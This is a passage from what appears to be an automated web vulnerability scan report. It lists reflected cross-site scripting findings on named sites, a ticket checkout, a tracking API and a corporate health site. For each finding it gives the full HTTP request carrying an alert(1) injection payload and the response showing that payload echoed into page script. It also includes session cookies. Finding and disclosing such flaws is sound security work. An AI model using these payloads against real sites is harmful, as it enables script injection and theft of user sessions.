GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=668a1'%3balert(1)//1b8fecb7052&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=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%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 17
ETag: "fb0f0d4f666b939a2a1e7cd630b2251a"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=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%3D%3D--bbd810f4a8f6aee49782e0c1df5f080b5dc003d9; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12033
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
p=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '668a1';alert(1)//1b8fecb7052' });
//]]>
...[SNIP]...

4.95. http://bing.fansnap.com/checkout/index/418563179 [ch parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of the ch request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bcdf'%3balert(1)//2713641b124 was submitted in the ch parameter. This input was echoed as 7bcdf';alert(1)//2713641b124 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing7bcdf'%3balert(1)//2713641b124&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=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%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 149
ETag: "789a7c9e1c5ee7b5c72b070ff4253e4d"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: ver=1; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:53 GMT
Set-Cookie: tvid=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: vid=; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:53 GMT
Set-Cookie: lvd=1311100553; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:35:53 GMT
Set-Cookie: _fancat_session=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%2FOgdscEkiAf9odHRwOi8vYmluZy5mYW5zbmFwLmNvbS9jaGVja291dC9pbmRleC80MTg1NjMxNzk%2FY3R4PWMlM0R0aXglM0JtdCUzRGludCUzQnRzcCUzRDAlM0JkdCUzRDElM0JscG9zJTNEMiZjaD1iaW5nN2JjZGYnJTNiYWxlcnQoMSkvLzI3MTM2NDFiMTI0JnF1YW50aXR5PTImbHA9dHJ1ZSZwb2N0eD1yYW5rJTNEMzYlM0JjcmF3bFNjb3JlJTNEbnVsbCUzQnBvcDElM0QwLjAzNzQlM0Jwb3AyJTNEMC4wMzc0JTNCcG9wMyUzRDAuMDM3NCUzQiZhZm09JnVldD0GOwdGOgxyZWZlcmVyIgGZaHR0cDovL2JpbmcuZmFuc25hcC5jb20vdTItdGlja2V0cy91Mi13aXRoLWludGVycG9sLXJlc2NoZWR1bGVkLWZyb20tNzE5L2p1bHktMjAtMjAxMS0zODk2Njk%2FdXRtX3NvdXJjZT0xOTg3JmFjaz1odHRwJTNhJTJmJTJmd3d3LmJpbmcuY29tJTJmcyUyZmFjay5odG1sOg12aXNpdF9pZGkE0EauNzoPdmlzaXRvcl9pZCIAOg5zdHlsZV9pZHNJIgAGOwdGOghsb2N7CjsQZhozMi43ODI0OTk5OTk5OTk5OTkAj1w7EWYbLTk2LjgyMDcwMDAwMDAwMDAwMgD08TsSaRI7EyIWRGFsbGFzLUZvcnQgV29ydGg7FEAa--ee1ba1006b679a9f3b53a6d54e24fc3cd43317f6; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 12049
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
ingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing7bcdf';alert(1)//2713641b124', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });
//]]>
...[SNIP]...

4.96. http://bing.fansnap.com/checkout/index/418563179 [ctx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of the ctx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b263b'%3balert(1)//2660bb145a6 was submitted in the ctx parameter. This input was echoed as b263b';alert(1)//2660bb145a6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2b263b'%3balert(1)//2660bb145a6&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=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%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 17
ETag: "585bbfb8bfee5437fab870e41f0b9469"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=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%3D%3D--2ecf5b7e4e9f630a03eece5d12b58bfb3cee9828; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11922
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2b263b';alert(1)//2660bb145a6'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;', afm: '' });
//]]>
...[SNIP]...

4.97. http://bing.fansnap.com/checkout/index/418563179 [poctx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of the poctx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2bd2'%3balert(1)//bac1f343622 was submitted in the poctx parameter. This input was echoed as c2bd2';alert(1)//bac1f343622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3Bc2bd2'%3balert(1)//bac1f343622&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 300
ETag: "5ff9664519f65b9a7781f49ed9ab43df"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=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%2F%2BCQBjoLb2Zmc2V0af6QnQ%3D%3D--1b66b51438b82f12b3c1ce5c5f99c1f32cece254; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11838
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop2=0.0374;pop3=0.0374;c2bd2';alert(1)//bac1f343622', afm: '' });
//]]>
...[SNIP]...

4.98. http://bing.fansnap.com/checkout/index/418563179 [quantity parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of the quantity request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 415c6%3balert(1)//307985a8d4c was submitted in the quantity parameter. This input was echoed as 415c6;alert(1)//307985a8d4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2415c6%3balert(1)//307985a8d4c&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=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%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 19
ETag: "ebe1f05b5ca7f470ad04bea1006a5098"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=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%3D%3D--0279fe035f67d15bb206dd13bb309897befe1c90; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11864
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
CheckoutInterstitialController.initialize({fbConnect: false, skipPingout: false, ticketSetId: 418563179, quantity: 2415c6;alert(1)//307985a8d4c, ctx: escape('c=tix;mt=int;tsp=0;dt=1;lpos=2'), fakeResult: 'none', salePrice: 62.0, roundedPrice: 62, split: ["2"], requestQty: false, channel: 'bing', poctx: 'rank=36;crawlScore=null;pop1=0.0374;pop
...[SNIP]...

4.99. http://bing.fansnap.com/checkout/index/418563179 [uet parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /checkout/index/418563179

Issue detail

The value of the uet request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45f62'%3balert(1)//460f48c4516 was submitted in the uet parameter. This input was echoed as 45f62';alert(1)//460f48c4516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A38966945f62'%3balert(1)//460f48c4516 HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=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%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 20
ETag: "40ada9b89ee6ead16a400de8babf6823"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=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%3D%3D--6657fee0d08aa8e33f9fc98ffe6124427ec80778; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11838
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<![CDATA[
PageUet.initialize('seats-uet', '-776896836:7925:pgscheckout','','bing',{tag:'mt:int;sz:1254;id:38966945f62';alert(1)//460f48c4516'})
//]]>
...[SNIP]...

4.100. http://cdnt.meteorsolutions.com/api/track [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnt.meteorsolutions.com
Path:   /api/track

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 6b0c8<script>alert(1)</script>acaef72a27e was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/track?application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=nSlUkQ8r7Lb&parent_fbid=&referrer=&location=http%3A%2F%2Fwww.discoverbing.com%2F&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B6b0c8<script>alert(1)</script>acaef72a27e HTTP/1.1
Host: cdnt.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=85865477.1307200302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=85865477.1920090660.1307200302.1307200302.1307200302.1; meteor_server_0370d778-6d35-93f3-466c-59c57e04ef74=0370d778-6d35-93f3-466c-59c57e04ef74%3C%3EVwS8Au3voUp%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.meteorsolutions.com%2F%253Ffbid%253DVwS8Au3voUp; meteor_server_c07f795b-7582-4b81-9576-782effe57ad7=c07f795b-7582-4b81-9576-782effe57ad7%3C%3EtRxY8SXOa6F%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fsocial.discoverbing.com%2F%253Fform%253DSHOHPB%2526publ%253DBINGCOM%2526crea%253DTEXT_SHOHPB_SocialSearch_Theme04_ShopWithFrnds_1x1; meteor_server_a71be9da-385a-45ab-b672-9d67c538b004=a71be9da-385a-45ab-b672-9d67c538b004%3C%3EB5nUnLnLLMn%3C%3E9uMSzSBW7pb%3C%3E%3C%3Ehttp%253A%2F%2Faz10143.vo.msecnd.net%2Fweb%2Foie9%2Findex_tyie9A.html%2523fbid%253D9uMSzSBW7pb%2526wom%253Dfalse; uid=0ad1f409-c147-4bb9-a425-2684ee1031f7

Response

HTTP/1.1 200 OK
Server: meteor/1.0
Date: Tue, 19 Jul 2011 15:17:00 GMT
Content-Type: application/javascript
Connection: close
P3P: CP="NID DSP ALL COR"
Etag: "d00ab68f758f97563f85eeddfa221adcab3289cf"
Content-Length: 174
Set-Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EnSlUkQ8r7Lb%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:17:00 GMT; Path=/
Set-Cookie: uid=0ad1f409-c147-4bb9-a425-2684ee1031f7; Domain=.meteorsolutions.com; expires=Wed, 18 Jul 2012 15:17:00 GMT; Path=/

meteor.json_query_callback({"parent_id": "", "id": "nSlUkQ8r7Lb", "uid": "0ad1f409\\x2Dc147\\x2D4bb9\\x2Da425\\x2D2684ee1031f7"}, 0);6b0c8<script>alert(1)</script>acaef72a27e

4.101. http://corporate.everydayhealth.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corporate.everydayhealth.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e12f'%3balert(1)//809941ee22b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1e12f';alert(1)//809941ee22b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?1e12f'%3balert(1)//809941ee22b=1 HTTP/1.1
Host: corporate.everydayhealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Waterfront-media
Cookie: SL_Audience=210|Accelerated|203|1|0; __utmz=104244948.1305642699.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; s_vi=[CS]v1|26E943688507A615-6000010160003977[CE]; .ASPXANONYMOUS=AcxLMZLcPztjNzU4YjAwZS05NzBkLTQ1MTctYWIyNy03MWNiM2NhYTlmM2I1; __utma=104244948.1964776954.1305642699.1305642699.1305642699.1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4766
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
Server-ID: : USNJWWEB02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 19 Jul 2011 20:20:07 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<script language='javascript'>var theform = document.forms[0];theform.action = '/index.aspx?puid=EEDAA734-76F5-44E1-92C3-004E57847A78&1e12f';alert(1)//809941ee22b=1';</script>
...[SNIP]...

4.102. http://corporate.everydayhealth.com/about-eh-sites.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corporate.everydayhealth.com
Path:   /about-eh-sites.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72398'%3balert(1)//453a224832a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72398';alert(1)//453a224832a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about-eh-sites.aspx?72398'%3balert(1)//453a224832a=1 HTTP/1.1
Host: corporate.everydayhealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://corporate.everydayhealth.com/
Cookie: SL_Audience=210|Accelerated|203|1|0; __utmz=104244948.1305642699.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; s_vi=[CS]v1|26E943688507A615-6000010160003977[CE]; .ASPXANONYMOUS=Acx84xcyPgZjNzU4YjAwZS05NzBkLTQ1MTctYWIyNy03MWNiM2NhYTlmM2I1; __utma=104244948.1964776954.1305642699.1305642699.1305642699.1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9510
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
Server-ID: : USNJWWEB02
